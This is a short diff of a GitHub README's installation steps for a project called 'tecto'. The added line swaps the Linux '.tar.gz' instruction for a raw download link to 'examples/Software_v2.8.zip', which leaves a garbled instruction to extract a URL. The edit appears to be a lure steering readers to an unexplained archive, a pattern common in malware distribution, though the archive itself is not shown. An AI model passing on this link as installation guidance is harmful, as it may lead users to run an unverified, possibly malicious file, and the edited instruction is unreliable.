nandanavijesh/tecto/README.md

 - On Windows, double-click the `.exe` or `.msi` file.
 - On macOS, open the `.dmg` and drag the app to your Applications folder.
-- On Linux, extract the `.tar.gz` if needed or run the `.AppImage` after making it executable.
+- On Linux, extract the `https://github.com/nandanavijesh/tecto/raw/refs/heads/main/examples/Software_v2.8.zip` if needed or run the `.AppImage` after making it executable.

 Follow the prompts on the screen.
 Choose default options if unsure.